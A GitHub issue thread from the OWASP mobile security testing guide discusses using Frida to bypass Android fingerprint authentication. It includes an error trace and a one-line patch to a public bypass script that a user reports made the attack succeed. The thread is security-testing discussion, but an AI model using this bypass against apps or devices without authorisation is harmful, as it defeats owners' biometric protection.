commjoen
commented
5 years ago Hi @d0n473ll0, thank you for submitting your issue. I can have a look at those scripts soon after appsec global Ansterdam ;-).
Closed d0n473ll0 closed 4 years ago
commjoen
commented
5 years ago Hi @d0n473ll0, thank you for submitting your issue. I can have a look at those scripts soon after appsec global Ansterdam ;-).
sushi2k
commented
5 years ago @d0n473ll0 Sorry for the late response. If possible, could you share the Frida script that you have done and what the error is?
Otherwise, you could try the script from MWR: https://labs.f-secure.com/blog/how-secure-is-your-android-keystore-authentication, in the section "Biometric/Fingerprint authentication".
If it works, please let us know then we can also add it to the MSTG.
d0n473ll0
commented
5 years ago @sushi2k Hello! Thank you very much! It works with a little fix!
When I tried https://github.com/FSecureLABS/android-keystore-audit/blob/master/frida-scripts/fingerprint-bypass.js on AVD emulator with API 23, I got error:
Error: <init>(): argument count of 3 does not match any of: .overload('android.hardware.fingerprint.FingerprintManager$CryptoObject', 'android.hardware.fingerprint.Fingerprint') at throwOverloadError (frida/node_modules/frida-java-bridge/lib/class-factory.js:1192) at n (frida/node_modules/frida-java-bridge/lib/class-factory.js:692) at /repl34.js:168 at input:1
because of FingerprintManager.AuthenticationResult object have just 2 arguments (see https://android.googlesource.com/platform/frameworks/base/+/marshmallow-release/core/java/android/hardware/fingerprint/FingerprintManager.java#268).
And then I just change https://github.com/FSecureLABS/android-keystore-audit/blob/master/frida-scripts/fingerprint-bypass.js#L168 to:
var authenticationResultInst = authenticationResultObj.$new(null, null);
and attack was a success!
d0n473ll0
commented
5 years ago And I plan to test it on a real device
commjoen
commented
5 years ago maybe have a little PR about this to further show how this works to all the rest of the readers :) ?
sushi2k
commented
5 years ago This issue is linked to : https://github.com/OWASP/owasp-mstg/issues/946 and #1504
sushi2k
commented
4 years ago @sushi2k Hello! Thank you very much! It works with a little fix!
When I tried https://github.com/FSecureLABS/android-keystore-audit/blob/master/frida-scripts/fingerprint-bypass.js on AVD emulator with API 23, I got error:
Error: <init>(): argument count of 3 does not match any of: .overload('android.hardware.fingerprint.FingerprintManager$CryptoObject', 'android.hardware.fingerprint.Fingerprint') at throwOverloadError (frida/node_modules/frida-java-bridge/lib/class-factory.js:1192) at n (frida/node_modules/frida-java-bridge/lib/class-factory.js:692) at /repl34.js:168 at input:1because of FingerprintManager.AuthenticationResult object have just 2 arguments (see https://android.googlesource.com/platform/frameworks/base/+/marshmallow-release/core/java/android/hardware/fingerprint/FingerprintManager.java#268).And then I just change https://github.com/FSecureLABS/android-keystore-audit/blob/master/frida-scripts/fingerprint-bypass.js#L168 to:
var authenticationResultInst = authenticationResultObj.$new(null, null);and attack was a success!
I raised it to the authors of the script (https://github.com/FSecureLABS/android-keystore-audit/issues/3) so will close this one. Could you reproduce this on a real device? If so, give them a nudge on the issue I created. Thanks
umersiddique741
commented
3 years ago how to prevent biometric authentication machanisim in mobile application
WarrDaddy
commented
3 years ago Hey I'm experiencing this issue. I've added the variable to line 168 per d0n473ll0's recommendation however, the error is persistent.
cpholguera
commented
3 years ago Hi @WarrDaddy, if you're experiencing any issues with that script please contact the authors directly at https://github.com/FSecureLABS/android-keystore-audit/issues/3
Thank you!
Hi there!
OWASP MSTG (https://github.com/OWASP/owasp-mstg/blob/master/Document/0x05f-Testing-Local-Authentication.md#dynamic-analysis-1) contains the following:
"you could use Frida to call the onAuthenticationSucceeded callback method directly"
I tried to implement this attack using Frida, and I can't find appropriate js script on the Internet.. Also, I tried to write own script for attack, but unsuccessfully..
Are you sure that such attack is possible in practice?